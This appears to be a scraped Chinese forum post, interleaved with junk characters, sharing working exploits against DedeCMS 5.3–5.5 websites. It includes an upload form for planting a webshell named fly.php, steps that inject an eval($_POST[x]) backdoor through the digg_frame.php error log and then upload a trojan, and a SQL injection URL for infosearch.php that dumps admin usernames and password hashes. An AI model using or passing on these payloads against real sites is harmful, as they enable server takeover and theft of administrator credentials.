<input type='hidden' name='job' value='upload' />7 B% ?3 f/ r' X4 G7 [
<input type='hidden' name='newname' value='fly.php' />% B7 v3 j' l+ V+ @5 }, a. `% C# E
Select U Shell <input type='file' name='uploadfile' size='25' />
# H' g7 `) I9 f: C<input type='submit' name='sb1' value='确定' />
2 k! h9 x" M4 ~* Q. h) M: F0 ^</form>
& X9 w5 [1 w+ ?: b& N* G$ [- h: k<br />It's just a exp for the bug of Dedecms V55...<br />
- T/ [* |& s9 ?" Y9 i: a& b; qNeed register_globals = on...<br />5 m9 S$ r" c  X* w* ^  B6 e2 X
Fun the game,get a webshell at /data/cache/fly.php...<br />
5 O) A: Z! T1 D5 q7 D0 Y</body>( H3 _+ F& }! A: ^
</html>
: ~$ n* t- _; i* |$ ^: A. `$ P
( v- w! U' P% q1 }+ K% O" A2 u
' N3 {, [3 y, v  ~9 v- y
8 s" @+ B: G4 Y; E
8 o$ p+ z0 d7 Z8 l9 @- t2 W' u% q
( J. \, I) C' X  c, J4 T- o# a& u. A4 s" r9 W4 i) _/ p) e$ X5 w
$ Z8 [! H9 Q' H9 G. R
" |  u; R- O& b- N  O
* K" ?! F; O" A& B7 U6 z/ O
$ ^9 F) ]& \: |# k0 n
织梦(dedecms)5.3 – 5.5 plus/digg_frame.php 注入漏洞; z$ y9 o6 `% T# K4 t$ e
利用了MySQL字段数值溢出引发错误和DEDECMS用PHP记录数据库错误信息并且文件头部没有验证的漏洞。+ U( X6 H4 e3 I  z
1. 访问网址：6 M% t! A/ k1 w2 P) K" |, \
http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
8 z6 L$ b0 b/ }/ q  x# {可看见错误信息
0 `. b3 K8 B" U) X% t4 |
! P* [' X: f# ?: x; Z; k' {0 D1 T% s8 i* e9 @
2. 访问 http://www.abc.com/data/mysql_error_trace.php 看到以下信息证明注入成功了。& t  l8 |) s- m9 T; \1 @. K/ r- Y
int(3) Error: Illegal double '1024e1024' value found during parsing( `) J3 s0 s* y- P: R' `1 o! A1 J
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>
$ ?, F' n0 s7 r4 Y3 k7 c  }1 H2 j7 D3 I9 z9 q5 \1 N
$ o. k9 s% B  e/ X; a2 E4 H  x
3. 执行dede.rar里的文件 test.html，注意 form 中 action 的地址是
7 u) Y- U3 E, U! q6 ]$ P; b; O# w; C6 E5 k; h$ u

8 _8 @+ s) h6 i: S+ L2 S( }<form action=”http://www.abc.com/data/mysql_error_trace.php” enctype=”application/x-www-form-urlencoded” method=”post”>
* [7 n  z; E1 c3 p
) U# s5 b9 n$ E. ?4 o
/ \6 x  j9 M5 Y& A9 x8 c按确定后的看到第2步骤的信息表示文件木马上传成功.$ V! z  Y* r' r& v
1 ?+ \- A0 V; {8 a: G2 {4 ^5 x

$ g7 U& Q$ C5 A0 T2 @$ @
, R& n4 F  e6 A% `6 _; k) k) y3 E$ Q  V3 `; w. z& K% N- N

5 M  [( m) W# _& H9 n6 n4 z5 S8 Y, I: x7 @4 i
# i, S( d4 M; b% n) ]% G) T

7 o4 h, D3 d3 u1 X
3 P- @7 M& ^# A; l5 c
5 T5 a/ \! Y' q, u" i. B* I! |5 ^& [

; y# b4 c1 B9 G& `9 w/ U: u" J织梦(DedeCms)plus/infosearch.php 文件注入漏洞
3 G' m5 h- X& m  N0 d+ Nhttp://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*

		自动登录	找回密码
密码			立即注册